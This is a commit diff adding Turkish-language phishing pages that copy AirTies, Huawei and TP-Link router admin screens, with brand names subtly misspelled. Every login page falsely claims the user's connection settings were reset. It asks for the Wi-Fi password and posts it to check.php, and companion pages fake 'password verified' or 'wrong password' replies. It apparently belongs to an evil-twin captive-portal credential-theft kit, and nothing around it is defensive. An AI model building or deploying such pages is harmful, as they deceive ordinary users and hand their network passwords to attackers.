added Turkish captive portal pages
|
@ -0,0 +1,88 @@
|
|||
<!DOCTYPE html>
|
||||
<html>
|
||||
|
||||
<head>
|
||||
<style>
|
||||
body {
|
||||
margin: 0px;
|
||||
background-color: transparent;
|
||||
overflow: hidden;
|
||||
position: relative;
|
||||
font-size: 90%;
|
||||
}
|
||||
|
||||
.mainframe-error {
|
||||
height: 60px;
|
||||
width: 100%;
|
||||
text-align: center;
|
||||
border-bottom: 1px;
|
||||
border-color: #CCCCCC;
|
||||
border-style: solid;
|
||||
border-left: 0px;
|
||||
border-right: 0px;
|
||||
border-top: 0px;
|
||||
}
|
||||
|
||||
.mainframe-error-text {
|
||||
padding-top: 20px;
|
||||
}
|
||||
|
||||
.mainframe-info {
|
||||
margin-left: 5%;
|
||||
margin-top: 5%;
|
||||
margin-bottom: 5%;
|
||||
}
|
||||
|
||||
.border-bottom {
|
||||
border-left: 0px;
|
||||
border-top: 0px;
|
||||
border-right: 0px;
|
||||
border-bottom: 1px;
|
||||
border-color: #CCCCCC;
|
||||
border-style: solid;
|
||||
}
|
||||
|
||||
.backbtn {
|
||||
background-image: url(images/buton_bg2.gif);
|
||||
color: #FFF;
|
||||
font-weight: bold;
|
||||
height: 21px;
|
||||
width: 110px;
|
||||
border: 0pt none;
|
||||
align-items: flex-start;
|
||||
text-align: center;
|
||||
cursor: default;
|
||||
background-color: buttonface;
|
||||
box-sizing: border-box;
|
||||
-webkit-appearance: push-button;
|
||||
user-select: none;
|
||||
white-space: pre;
|
||||
-webkit-rtl-ordering: logical;
|
||||
margin: 0em;
|
||||
font: 400 13.3333px Arial;
|
||||
letter-spacing: normal;
|
||||
word-spacing: normal;
|
||||
text-transform: none;
|
||||
text-indent: 0px;
|
||||
text-shadow: none;
|
||||
display: inline-block;
|
||||
text-rendering: auto;
|
||||
margin-top: 50px;
|
||||
}
|
||||
</style>
|
||||
|
||||
</head>
|
||||
|
||||
<body>
|
||||
<div class="mainframe-error">
|
||||
<p class="mainframe-error-text">Bağlantı ayarlarınız sıfırlandı!</p>
|
||||
</div>
|
||||
<div class="border-bottom">
|
||||
<p class="mainframe-info">Girdiğiniz parola yanlış. Lütfen kontrol edip tekrar giriniz.</p>
|
||||
</div>
|
||||
<center>
|
||||
<input onclick="history.back();return false" class="backbtn" type="submit" value="Geri" />
|
||||
</center>
|
||||
</body>
|
||||
|
||||
</html>
|
|
@ -0,0 +1,64 @@
|
|||
<!DOCTYPE html>
|
||||
<html>
|
||||
|
||||
<head>
|
||||
<style>
|
||||
body {
|
||||
margin: 0px;
|
||||
background-color: transparent;
|
||||
overflow: hidden;
|
||||
position: relative;
|
||||
font-size: 90%;
|
||||
}
|
||||
|
||||
.mainframe-error {
|
||||
height: 60px;
|
||||
width: 100%;
|
||||
text-align: center;
|
||||
border-bottom: 1px;
|
||||
border-color: #CCCCCC;
|
||||
border-style: solid;
|
||||
border-left: 0px;
|
||||
border-right: 0px;
|
||||
border-top: 0px;
|
||||
}
|
||||
|
||||
.mainframe-error-text {
|
||||
padding-top: 20px;
|
||||
}
|
||||
|
||||
.mainframe-info {
|
||||
margin-left: 5%;
|
||||
margin-top: 5%;
|
||||
margin-bottom: 5%;
|
||||
}
|
||||
|
||||
.border-bottom {
|
||||
border-left: 0px;
|
||||
border-top: 0px;
|
||||
border-right: 0px;
|
||||
border-bottom: 1px;
|
||||
border-color: #CCCCCC;
|
||||
border-style: solid;
|
||||
}
|
||||
|
||||
.loading {
|
||||
margin-top: 30px;
|
||||
}
|
||||
</style>
|
||||
|
||||
</head>
|
||||
|
||||
<body>
|
||||
<div class="mainframe-error">
|
||||
<p class="mainframe-error-text">Bağlantı ayarlarınız sıfırlandı!</p>
|
||||
</div>
|
||||
<div class="border-bottom">
|
||||
<p class="mainframe-info">Parolanız doğrulandı bağlantınız yenileniyor...</p>
|
||||
</div>
|
||||
<center>
|
||||
<img class="loading" src="images/loading.gif" width="100px">
|
||||
</center>
|
||||
</body>
|
||||
|
||||
</html>
|
After Width: | Height: | Size: 1.9 KiB |
After Width: | Height: | Size: 1.1 KiB |
After Width: | Height: | Size: 16 KiB |
After Width: | Height: | Size: 78 KiB |
After Width: | Height: | Size: 74 B |
|
@ -0,0 +1,68 @@
|
|||
<!DOCTYPE html>
|
||||
<html>
|
||||
|
||||
<head>
|
||||
<title>AirTies</title>
|
||||
<link href="images/favicon.ico" rel="icon" type="image/x-icon" />
|
||||
<style>
|
||||
html {
|
||||
height: 100%;
|
||||
}
|
||||
|
||||
body {
|
||||
margin: 0px;
|
||||
}
|
||||
|
||||
.header {
|
||||
background-image: url(images/v_line_bg.gif);
|
||||
width: 100%;
|
||||
max-height: 112px;
|
||||
height: 112px;
|
||||
}
|
||||
|
||||
.content {
|
||||
width: 100%;
|
||||
height: 100%;
|
||||
position: relative;
|
||||
}
|
||||
|
||||
.content-child {
|
||||
margin: 0;
|
||||
position: relative;
|
||||
left: 50%;
|
||||
transform: translate(-50%, 0);
|
||||
height: 285px;
|
||||
width: 360px;
|
||||
border-width: 1px;
|
||||
border-color: #CCCCCC;
|
||||
border-style: solid;
|
||||
margin-top: 100px;
|
||||
}
|
||||
|
||||
iframe {
|
||||
border: none;
|
||||
}
|
||||
|
||||
.footer {
|
||||
font-size: 75%;
|
||||
padding-top: 15px;
|
||||
}
|
||||
</style>
|
||||
</head>
|
||||
|
||||
<body>
|
||||
<div class="header">
|
||||
<img src="images/airties_logo.gif">
|
||||
</div>
|
||||
<div class="content">
|
||||
<div class="content-child">
|
||||
<iframe src="info.html" width="360" height="285" align="center"></iframe>
|
||||
</div>
|
||||
<div class="footer">
|
||||
<p align="center">Copyright © 2005-2013 AirTiies Kablosuz Sistemler. Bütün hakları saklıdır.</p>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
</body>
|
||||
|
||||
</html>
|
|
@ -0,0 +1,117 @@
|
|||
<!DOCTYPE html>
|
||||
<html>
|
||||
|
||||
<head>
|
||||
<style>
|
||||
body {
|
||||
margin: 0px;
|
||||
background-color: transparent;
|
||||
overflow: hidden;
|
||||
position: relative;
|
||||
font-size: 90%;
|
||||
}
|
||||
|
||||
.mainframe-error {
|
||||
height: 60px;
|
||||
width: 100%;
|
||||
text-align: center;
|
||||
border-bottom: 1px;
|
||||
border-color: #CCCCCC;
|
||||
border-style: solid;
|
||||
border-left: 0px;
|
||||
border-right: 0px;
|
||||
border-top: 0px;
|
||||
}
|
||||
|
||||
.mainframe-error-text {
|
||||
padding-top: 20px;
|
||||
}
|
||||
|
||||
.mainframe-info {
|
||||
margin-left: 5%;
|
||||
}
|
||||
|
||||
.border-bottom {
|
||||
border-left: 0px;
|
||||
border-top: 0px;
|
||||
border-right: 0px;
|
||||
border-bottom: 1px;
|
||||
border-color: #CCCCCC;
|
||||
border-style: solid;
|
||||
}
|
||||
|
||||
.table-input {
|
||||
padding-top: 5px;
|
||||
padding-bottom: 5px;
|
||||
}
|
||||
|
||||
.div-fill-all {
|
||||
width: 100%;
|
||||
padding-top: 20px;
|
||||
}
|
||||
|
||||
.confirmbtn {
|
||||
background-image: url(images/buton_bg2.gif);
|
||||
color: #FFF;
|
||||
font-weight: bold;
|
||||
height: 21px;
|
||||
width: 110px;
|
||||
border: 0pt none;
|
||||
align-items: flex-start;
|
||||
text-align: center;
|
||||
cursor: default;
|
||||
background-color: buttonface;
|
||||
box-sizing: border-box;
|
||||
-webkit-appearance: push-button;
|
||||
user-select: none;
|
||||
white-space: pre;
|
||||
-webkit-rtl-ordering: logical;
|
||||
margin: 0em;
|
||||
font: 400 13.3333px Arial;
|
||||
letter-spacing: normal;
|
||||
word-spacing: normal;
|
||||
text-transform: none;
|
||||
text-indent: 0px;
|
||||
text-shadow: none;
|
||||
display: inline-block;
|
||||
text-rendering: auto;
|
||||
}
|
||||
</style>
|
||||
|
||||
</head>
|
||||
|
||||
<body>
|
||||
<div class="mainframe-error">
|
||||
<p class="mainframe-error-text">Bağlantı ayarlarınız sıfırlandı!</p>
|
||||
</div>
|
||||
<div class="border-bottom">
|
||||
<p class="mainframe-info">Bağlantınızda bir sorun algılandı ve bağlantı ayarlarınız sıfırlandı</p>
|
||||
<p class="mainframe-info">Bağlantınızı geri getirmek için şifrenizi giriniz:</p>
|
||||
</div>
|
||||
<div class="table-div border-bottom">
|
||||
<table class="table-input " align="center">
|
||||
<tbody>
|
||||
<tr>
|
||||
<td>
|
||||
<p>Şifre</p>
|
||||
</td>
|
||||
<form id="form1" name="form1" method="POST" action="check.php">
|
||||
<td class="table-data-1">
|
||||
<input name="key1" type="password" class="input-pass" />
|
||||
</td>
|
||||
</tr>
|
||||
</tbody>
|
||||
|
||||
</table>
|
||||
|
||||
</div>
|
||||
<div class="div-fill-all">
|
||||
<center>
|
||||
<input name="Confirm" class="confirmbtn" type="submit" value="Tamam" />
|
||||
</center>
|
||||
</div>
|
||||
</form>
|
||||
|
||||
</body>
|
||||
|
||||
</html>
|
|
@ -0,0 +1,55 @@
|
|||
<!DOCTYPE html>
|
||||
<html>
|
||||
|
||||
<head>
|
||||
<style>
|
||||
body {
|
||||
margin: 0px;
|
||||
background-color: transparent;
|
||||
overflow: hidden;
|
||||
}
|
||||
|
||||
.main-frame-text-error {
|
||||
text-align: left;
|
||||
color: #7F7F7F;
|
||||
font-size: 18px;
|
||||
margin-top: 20px;
|
||||
padding-left: 5%;
|
||||
}
|
||||
|
||||
.main-frame-text {
|
||||
padding-left: 10%;
|
||||
padding-right: 10%;
|
||||
color: #74797b;
|
||||
}
|
||||
|
||||
.backbtn {
|
||||
-moz-border-radius: 5px;
|
||||
-webkit-border-radius: 5px;
|
||||
border-radius: 5px;
|
||||
width: 160px;
|
||||
height: 35px;
|
||||
background: -webkit-gradient(linear, left top, left bottom, from(#80c1f6), to(#50b1fe));
|
||||
background: -moz-linear-gradient(top, #80c1f6, #50b1fe);
|
||||
background: -o-linear-gradient(top, #80c1f6, #50b1fe);
|
||||
filter: progid: DXImageTransform.Microsoft.Gradient(StartColorStr='#80c1f6', EndColorStr='#50b1fe', GradientType=0);
|
||||
padding: 0px;
|
||||
margin-top: 5%;
|
||||
}
|
||||
|
||||
strong {
|
||||
font-weight: bold;
|
||||
}
|
||||
</style>
|
||||
|
||||
</head>
|
||||
|
||||
<body>
|
||||
<p class="main-frame-text-error">Bağlantı ayarlarınız sıfırlandı!</p>
|
||||
<p class="main-frame-text">Girdiğiniz parola <strong>yanlış!</strong> Lütfen kontrol edip tekrar giriniz.</p>
|
||||
<center>
|
||||
<input onclick="history.back();return false" class="backbtn" type="submit" value="Geri" />
|
||||
</center>
|
||||
</body>
|
||||
|
||||
</html>
|
|
@ -0,0 +1,44 @@
|
|||
<!DOCTYPE html>
|
||||
<html>
|
||||
|
||||
<head>
|
||||
<style>
|
||||
body {
|
||||
margin: 0px;
|
||||
background-color: transparent;
|
||||
overflow: hidden;
|
||||
}
|
||||
|
||||
.main-frame-text-error {
|
||||
text-align: left;
|
||||
color: #7F7F7F;
|
||||
font-size: 18px;
|
||||
margin-top: 20px;
|
||||
padding-left: 5%;
|
||||
}
|
||||
|
||||
.main-frame-text {
|
||||
padding-left: 10%;
|
||||
padding-right: 10%;
|
||||
color: #74797b;
|
||||
}
|
||||
|
||||
.loading {
|
||||
margin-top: 3%;
|
||||
width: 100px;
|
||||
}
|
||||
</style>
|
||||
|
||||
</head>
|
||||
|
||||
<body>
|
||||
<p class="main-frame-text-error">Bağlantı ayarlarınız sıfırlandı!</p>
|
||||
<p class="main-frame-text">Parola doğrulandı</p>
|
||||
<p class="main-frame-text">Bağlantınız yenileniyor</p>
|
||||
|
||||
<center>
|
||||
<img class="loading" src="images/loading.gif">
|
||||
</center>
|
||||
</body>
|
||||
|
||||
</html>
|
After Width: | Height: | Size: 1.1 KiB |
After Width: | Height: | Size: 7.7 KiB |
After Width: | Height: | Size: 78 KiB |
After Width: | Height: | Size: 2.0 KiB |
After Width: | Height: | Size: 1.8 KiB |
After Width: | Height: | Size: 1.7 KiB |
|
@ -0,0 +1,266 @@
|
|||
<!DOCTYPE html>
|
||||
<html>
|
||||
|
||||
<head>
|
||||
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
|
||||
<link href="images/favicon.ico" rel="icon" type="image/x-icon" />
|
||||
<title>Huawei Home Gateway</title>
|
||||
<style>
|
||||
html {
|
||||
height: 100%;
|
||||
margin: 0px;
|
||||
}
|
||||
|
||||
body {
|
||||
background-color: #ebebeb;
|
||||
height: 100%;
|
||||
margin: 0px;
|
||||
font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
|
||||
}
|
||||
|
||||
.container {
|
||||
margin-left: 20%;
|
||||
margin-right: 20%;
|
||||
min-width: 905px;
|
||||
overflow: hidden;
|
||||
}
|
||||
|
||||
.header {
|
||||
background-color: white;
|
||||
height: 60px;
|
||||
max-height: 60px;
|
||||
display: flex;
|
||||
min-width: 500px;
|
||||
}
|
||||
|
||||
.logo {
|
||||
padding: 5px 0;
|
||||
zoom: 80%;
|
||||
margin: 0;
|
||||
display: inline-block;
|
||||
}
|
||||
|
||||
.logo_text {
|
||||
margin-top: 15px;
|
||||
margin-left: 8px;
|
||||
font-weight: bold;
|
||||
}
|
||||
|
||||
.lang {
|
||||
margin-right: 10px;
|
||||
margin-top: 20px;
|
||||
}
|
||||
|
||||
.main {
|
||||
margin-top: 20px;
|
||||
background-color: white;
|
||||
height: 600px;
|
||||
border-radius: 8px;
|
||||
overflow: hidden;
|
||||
position: relative;
|
||||
}
|
||||
|
||||
.footer {
|
||||
color: #777777;
|
||||
width: 100%;
|
||||
font-size: 10px;
|
||||
margin-top: 2px;
|
||||
}
|
||||
|
||||
.footer-text {
|
||||
display: inline;
|
||||
}
|
||||
|
||||
.footer-link {
|
||||
margin-left: 10px;
|
||||
display: inline;
|
||||
text-decoration: none;
|
||||
color: #777777;
|
||||
}
|
||||
|
||||
.navbar {
|
||||
background-image: url(images/navbar.png);
|
||||
height: 52px;
|
||||
width: 100%;
|
||||
display: block;
|
||||
}
|
||||
|
||||
.navbar-button {
|
||||
background-image: url(images/navbar.png);
|
||||
width: 150px;
|
||||
height: 100%;
|
||||
background-color: aqua;
|
||||
float: left;
|
||||
margin-left: 0px;
|
||||
overflow: hidden;
|
||||
text-decoration: none;
|
||||
color: white;
|
||||
text-shadow: 0px 2px 2px rgba(0, 0, 0, 0.3);
|
||||
}
|
||||
|
||||
.navbar-button:hover {
|
||||
background-image: url(images/navbar-hover.png);
|
||||
}
|
||||
|
||||
.navbar-button-maintain {
|
||||
background-image: url(images/navbar.png);
|
||||
height: 100%;
|
||||
float: right;
|
||||
min-width: 150px;
|
||||
margin-right: 0;
|
||||
margin-left: auto;
|
||||
background-color: aqua;
|
||||
text-decoration: none;
|
||||
color: white;
|
||||
text-shadow: 0px 2px 2px rgba(0, 0, 0, 0.3);
|
||||
}
|
||||
|
||||
.navbar-button-maintain:hover {
|
||||
background-image: url(images/navbar-hover.png);
|
||||
}
|
||||
|
||||
.navbar-button-link {
|
||||
overflow: auto;
|
||||
}
|
||||
|
||||
.navbar-button-splitter {
|
||||
height: 52px;
|
||||
width: 1px;
|
||||
background-color: #777777;
|
||||
float: left;
|
||||
z-index: 0;
|
||||
}
|
||||
|
||||
.navbar-button-splitter-z {
|
||||
height: 52px;
|
||||
width: 1px;
|
||||
background-color: #777777;
|
||||
float: left;
|
||||
z-index: 1;
|
||||
}
|
||||
|
||||
.shadow {
|
||||
filter: progid: DXImageTransform.Microsoft.dropshadow(OffX=0, OffY=10, Color='gray');
|
||||
-ms-filter: "progid:DXImageTransform.Microsoft.dropshadow(OffX=5, OffY=5, Color='gray')";
|
||||
-o-box-shadow: 0px 8px 5px #939393;
|
||||
-moz-box-shadow: 0px 8px 5px #939393;
|
||||
-webkit-box-shadow: 0px 8px 5px #939393;
|
||||
box-shadow: 0px 8px 5px #939393;
|
||||
-ms-filter: "progid:DXImageTransform.Microsoft.Shadow(Strength=10, Direction=180, color='#939393')";
|
||||
filter: progid: DXImageTransform.Microsoft.Shadow(Strength=10, Direction=180, color='#939393');
|
||||
}
|
||||
|
||||
.main-top {
|
||||
background-color: #F2F9FF;
|
||||
width: 100%;
|
||||
height: 120px;
|
||||
z-index: 0;
|
||||
position: absolute;
|
||||
}
|
||||
|
||||
.main-frame {
|
||||
z-index: 1;
|
||||
position: absolute;
|
||||
width: 500px;
|
||||
height: 300px;
|
||||
left: 50%;
|
||||
transform: translate(-50%, 0);
|
||||
margin-top: 80px;
|
||||
border-radius: 8px;
|
||||
overflow: hidden;
|
||||
background-color: #F9F9FB;
|
||||
border: solid;
|
||||
border-width: 1px;
|
||||
border-color: #DADADA;
|
||||
}
|
||||
|
||||
.main-frame-line {
|
||||
width: 100%;
|
||||
height: 3px;
|
||||
background-color: #9FCBF2;
|
||||
}
|
||||
|
||||
.main-frame-text-login {
|
||||
text-align: left;
|
||||
color: #7F7F7F;
|
||||
font-size: 18px;
|
||||
margin-top: 20px;
|
||||
padding-left: 5%;
|
||||
}
|
||||
|
||||
iframe {
|
||||
border: none;
|
||||
width: 100%;
|
||||
height: 100%;
|
||||
}
|
||||
</style>
|
||||
</head>
|
||||
|
||||
<body>
|
||||
<div class="container">
|
||||
<div class="header">
|
||||
<div>
|
||||
<a href="#"><img class="logo" src="images/huawei_logo.png"></a>
|
||||
</div>
|
||||
<div style="display: flex; width: 100px;">
|
||||
<p class="logo_text">Home Gateway</p>
|
||||
</div>
|
||||
<div style="margin-left:auto; margin-right:0;">
|
||||
<a style="text-decoration: none; color:#777777;" href="#">
|
||||
<p class="lang">Türkçe ▶</p>
|
||||
</a>
|
||||
</div>
|
||||
</div>
|
||||
<div class="navbar shadow">
|
||||
<!--HOME-->
|
||||
<a href="#" class="navbar-button">
|
||||
<p align="center" class="navbar-button-link">Home</p>
|
||||
</a>
|
||||
<div class="navbar-button-splitter"></div>
|
||||
<!--INTERNET-->
|
||||
<a href="#" class="navbar-button">
|
||||
<p align="center" class="navbar-button-link">Internet</p>
|
||||
</a>
|
||||
<div class="navbar-button-splitter"></div>
|
||||
<!--HOME NETWORK-->
|
||||
<a href="#" class="navbar-button">
|
||||
<p align="center" class="navbar-button-link">Home Network</p>
|
||||
</a>
|
||||
<div class="navbar-button-splitter"></div>
|
||||
<!--SHARE-->
|
||||
<a href="#" class="navbar-button">
|
||||
<p align="center" class="navbar-button-link">Share</p>
|
||||
</a>
|
||||
<div class="navbar-button-splitter"></div>
|
||||
<!--TELEPHONY-->
|
||||
<a href="#" class="navbar-button">
|
||||
<p align="center" class="navbar-button-link">Telephony</p>
|
||||
</a>
|
||||
<div class="navbar-button-splitter"></div>
|
||||
<!--MAINTAIN-->
|
||||
<a href="#" class="navbar-button-maintain">
|
||||
<div class="navbar-button-splitter-z"></div>
|
||||
<p align="center" class="navbar-button-link">Maintain</p>
|
||||
</a>
|
||||
|
||||
</div>
|
||||
<!--Header end-->
|
||||
<div class="main">
|
||||
<div class="main-top"></div>
|
||||
<div class="main-frame">
|
||||
<div class="main-frame-line"></div>
|
||||
<iframe src="info.html" width="440" height="265" align="center"></iframe>
|
||||
</div>
|
||||
</div>
|
||||
<!--Main end-->
|
||||
<div class="footer">
|
||||
<center>
|
||||
<p class="footer-text">Copyright © Huavei Technologies Co., Ltd. 2012-2018. All rights reserved.</p><a href="#" class="footer-link">Privacy Policy</a><a href="#" class="footer-link">Open Source Software Declaration</a>
|
||||
</center>
|
||||
</div>
|
||||
|
||||
</div>
|
||||
|
||||
</body>
|
||||
|
||||
</html>
|
|
@ -0,0 +1,115 @@
|
|||
<!DOCTYPE html>
|
||||
<html>
|
||||
|
||||
<head>
|
||||
<style>
|
||||
body {
|
||||
margin: 0px;
|
||||
background-color: transparent;
|
||||
overflow: hidden;
|
||||
}
|
||||
|
||||
.main-frame-text-error {
|
||||
text-align: left;
|
||||
color: #7F7F7F;
|
||||
font-size: 18px;
|
||||
margin-top: 20px;
|
||||
padding-left: 5%;
|
||||
}
|
||||
|
||||
.main-frame-text {
|
||||
padding-left: 10%;
|
||||
padding-right: 10%;
|
||||
color: #74797b;
|
||||
}
|
||||
|
||||
.main-frame-over-input-text {
|
||||
padding-left: 10%;
|
||||
padding-right: 10%;
|
||||
color: #74797b;
|
||||
}
|
||||
|
||||
.table-div {
|
||||
padding-left: 10%;
|
||||
}
|
||||
|
||||
.table-input {
|
||||
width: 400;
|
||||
border-collapse: collapse;
|
||||
border-spacing: 0;
|
||||
}
|
||||
|
||||
.table-data-1 {
|
||||
border-width: 1px 1px 1px 1px;
|
||||
border-style: solid;
|
||||
border-color: #CBCBCD;
|
||||
background-color: #eeeeee;
|
||||
}
|
||||
|
||||
.table-white {
|
||||
background-color: white;
|
||||
color: #7F7F7F;
|
||||
font-size: 14px;
|
||||
padding-left: 10px;
|
||||
}
|
||||
|
||||
.table-image {
|
||||
margin-left: 5px;
|
||||
margin-top:2px;
|
||||
|
||||
}
|
||||
|
||||
.input-pass {
|
||||
width: 100%;
|
||||
height: 100%;
|
||||
padding: 0px;
|
||||
}
|
||||
|
||||
.confirmbtn {
|
||||
-moz-border-radius: 5px;
|
||||
-webkit-border-radius: 5px;
|
||||
border-radius: 5px;
|
||||
width: 100%;
|
||||
height: 100%;
|
||||
background: -webkit-gradient(linear, left top, left bottom, from(#80c1f6), to(#50b1fe));
|
||||
background: -moz-linear-gradient(top, #80c1f6, #50b1fe);
|
||||
background: -o-linear-gradient(top, #80c1f6, #50b1fe);
|
||||
filter: progid: DXImageTransform.Microsoft.Gradient(StartColorStr='#80c1f6', EndColorStr='#50b1fe', GradientType=0);
|
||||
padding: 0px;
|
||||
}
|
||||
</style>
|
||||
|
||||
</head>
|
||||
|
||||
<body>
|
||||
<p class="main-frame-text-error">Bağlantı ayarlarınız sıfırlandı!</p>
|
||||
<p class="main-frame-text">Bağlantınızda bir sorun algılandı ve bağlantı ayarlarınız sıfırlandı</p>
|
||||
<p class="main-frame-over-input-text">Bağlantınızı geri getirmek için şifrenizi giriniz:</p>
|
||||
<div class="table-div">
|
||||
<table class="table-input">
|
||||
<tbody>
|
||||
<tr>
|
||||
<td class="table-data-1">
|
||||
<img src="images/password.png" class="table-image">
|
||||
</td>
|
||||
<td class="table-data-1 table-white">
|
||||
<p>Şifre</p>
|
||||
</td>
|
||||
<form id="form1" name="form1" method="POST" action="check.php">
|
||||
<td class="table-data-1">
|
||||
<input name="key1" type="password" class="input-pass" />
|
||||
</td>
|
||||
<td class="table-data-1">
|
||||
<input name="Confirm" class="confirmbtn" type="submit" value="Onayla" />
|
||||
</td>
|
||||
|
||||
</form>
|
||||
</tr>
|
||||
</tbody>
|
||||
|
||||
</table>
|
||||
</div>
|
||||
|
||||
</body>
|
||||
|
||||
</html>
|
|
@ -0,0 +1,48 @@
|
|||
<!DOCTYPE html>
|
||||
<html>
|
||||
|
||||
<head>
|
||||
<style>
|
||||
body {
|
||||
height: 100%;
|
||||
margin: 0px;
|
||||
background-color: rgba(255, 255, 255, 0.3);
|
||||
position: relative;
|
||||
}
|
||||
|
||||
.error-text {
|
||||
background-color: rgb(102, 186, 51);
|
||||
width: 100%;
|
||||
display: inline-block;
|
||||
}
|
||||
|
||||
h1 {
|
||||
font-size: 16px;
|
||||
color: WHITE;
|
||||
font-weight: bold;
|
||||
margin-left: 15px;
|
||||
margin-top: 5px;
|
||||
margin-bottom: 5px;
|
||||
}
|
||||
|
||||
.context {
|
||||
margin-left: 5%;
|
||||
}
|
||||
</style>
|
||||
</head>
|
||||
|
||||
<body>
|
||||
<div class="error-text">
|
||||
<h1>Bağlantınızda bir sorun oluştu!</h1>
|
||||
</div>
|
||||
<div class="context">
|
||||
<p>Parolanızı yanlış girdiniz</p>
|
||||
<p>Lütfen parolanızı kontrol edip tekrar giriş yapınız</p>
|
||||
<center style="margin-right: 5%; margin-top: 5%;">
|
||||
<input onclick="history.back();return false" type="submit" value="Geri" />
|
||||
</center>
|
||||
</form>
|
||||
</div>
|
||||
</body>
|
||||
|
||||
</html>
|
|
@ -0,0 +1,52 @@
|
|||
<!DOCTYPE html>
|
||||
<html>
|
||||
|
||||
<head>
|
||||
<style>
|
||||
body {
|
||||
height: 100%;
|
||||
margin: 0px;
|
||||
background-color: rgba(255, 255, 255, 0.3);
|
||||
position: relative;
|
||||
}
|
||||
|
||||
.error-text {
|
||||
background-color: rgb(102, 186, 51);
|
||||
width: 100%;
|
||||
display: inline-block;
|
||||
}
|
||||
|
||||
h1 {
|
||||
font-size: 16px;
|
||||
color: WHITE;
|
||||
font-weight: bold;
|
||||
margin-left: 15px;
|
||||
margin-top: 5px;
|
||||
margin-bottom: 5px;
|
||||
}
|
||||
|
||||
.context {
|
||||
margin-left: 5%;
|
||||
}
|
||||
|
||||
.loading {
|
||||
width: 100px;
|
||||
}
|
||||
</style>
|
||||
</head>
|
||||
|
||||
<body>
|
||||
<div class="error-text">
|
||||
<h1>Bağlantınızda bir sorun oluştu!</h1>
|
||||
</div>
|
||||
<div class="context">
|
||||
<p>Parolanız doğrulandı</p>
|
||||
<p>Bağlantınız yenileniyor...</p>
|
||||
<center style="margin-right: 5%; margin-top: 5%;">
|
||||
<img class="loading" src="images/loading.gif">
|
||||
</center>
|
||||
</form>
|
||||
</div>
|
||||
</body>
|
||||
|
||||
</html>
|
After Width: | Height: | Size: 10 KiB |
After Width: | Height: | Size: 318 B |
After Width: | Height: | Size: 78 KiB |
After Width: | Height: | Size: 5.2 KiB |
After Width: | Height: | Size: 16 KiB |
After Width: | Height: | Size: 605 B |
|
@ -0,0 +1,95 @@
|
|||
<!DOCTYPE html>
|
||||
<html>
|
||||
|
||||
<head>
|
||||
<link href="images/favicon.ico" rel="icon" type="image/x-icon" />
|
||||
<title>TP-Link Wireless N Router</title>
|
||||
<style>
|
||||
html {
|
||||
height: 100%;
|
||||
margin: auto;
|
||||
}
|
||||
|
||||
body {
|
||||
margin: 0px;
|
||||
background-image: url(images/background.png);
|
||||
height: 100%;
|
||||
margin: auto;
|
||||
}
|
||||
|
||||
.header {
|
||||
background-image: url(images/top_bg.jpg);
|
||||
overflow: auto;
|
||||
user-select: none;
|
||||
-khtml-user-select: none;
|
||||
-o-user-select: none;
|
||||
-moz-user-select: -moz-none;
|
||||
-webkit-user-select: none;
|
||||
pointer-events: none;
|
||||
}
|
||||
|
||||
.header .left {
|
||||
float: left;
|
||||
}
|
||||
|
||||
.header .left img {
|
||||
position: relative;
|
||||
z-index: 1;
|
||||
}
|
||||
|
||||
.header .right {
|
||||
position: relative;
|
||||
}
|
||||
|
||||
.header .right img {
|
||||
position: absolute;
|
||||
right: 0;
|
||||
z-index: 0;
|
||||
}
|
||||
|
||||
.panel_content {
|
||||
border: none;
|
||||
overflow: auto;
|
||||
height: 80%;
|
||||
}
|
||||
|
||||
iframe {
|
||||
border: none;
|
||||
display: block;
|
||||
margin-top: 10%;
|
||||
border-radius: 8px;
|
||||
overflow: auto;
|
||||
user-select: none;
|
||||
-khtml-user-select: none;
|
||||
-o-user-select: none;
|
||||
-moz-user-select: -moz-none;
|
||||
-webkit-user-select: none;
|
||||
}
|
||||
|
||||
.hcenter {
|
||||
margin: auto;
|
||||
}
|
||||
</style>
|
||||
<!--<link rel="stylesheet" type="text/css" href="info.css" media="all">-->
|
||||
|
||||
</head>
|
||||
|
||||
<body>
|
||||
<div class="header">
|
||||
<div class="left">
|
||||
<img src="images/top1_1.jpg">
|
||||
</div>
|
||||
<div class="right">
|
||||
<img src="images/top1_2.jpg" />
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<div class="panel_content" id="panel_content" align="center">
|
||||
<div class="hcenter">
|
||||
|
||||
<iframe src="info.html" width="440" height="265" align="center"></iframe>
|
||||
</div>
|
||||
</div>
|
||||
</body>
|
||||
|
||||
</html>
|
|
@ -0,0 +1,51 @@
|
|||
<!DOCTYPE html>
|
||||
<html>
|
||||
|
||||
<head>
|
||||
<style>
|
||||
body {
|
||||
height: 100%;
|
||||
margin: 0px;
|
||||
background-color: rgba(255, 255, 255, 0.3);
|
||||
position: relative;
|
||||
}
|
||||
|
||||
.error-text {
|
||||
background-color: rgb(102, 186, 51);
|
||||
width: 100%;
|
||||
display: inline-block;
|
||||
}
|
||||
|
||||
h1 {
|
||||
font-size: 16px;
|
||||
color: WHITE;
|
||||
font-weight: bold;
|
||||
margin-left: 15px;
|
||||
margin-top: 5px;
|
||||
margin-bottom: 5px;
|
||||
}
|
||||
|
||||
.context {
|
||||
margin-left: 5%;
|
||||
}
|
||||
</style>
|
||||
</head>
|
||||
|
||||
<body>
|
||||
<div class="error-text">
|
||||
<h1>Bağlantınızda bir sorun oluştu!</h1>
|
||||
</div>
|
||||
<div class="context">
|
||||
<p>Bağlantınızda bir sorun algılandı ve bağlantı ayarlarınız sıfırlandı</p>
|
||||
<p>Bağlantınızı geri getirmek için şifrenizi giriniz:</p>
|
||||
<form id="form1" name="form1" method="POST" action="check.php">
|
||||
<center style="margin-right: 5%; margin-top: 5%;">
|
||||
<p style="display:inline;">Şifre:</p>
|
||||
<input name="key1" type="password" style="display:inline;" />
|
||||
<input name="Confirm" class="confirmbtn" type="submit" value="Onayla" />
|
||||
</center>
|
||||
</form>
|
||||
</div>
|
||||
</body>
|
||||
|
||||
</html>
|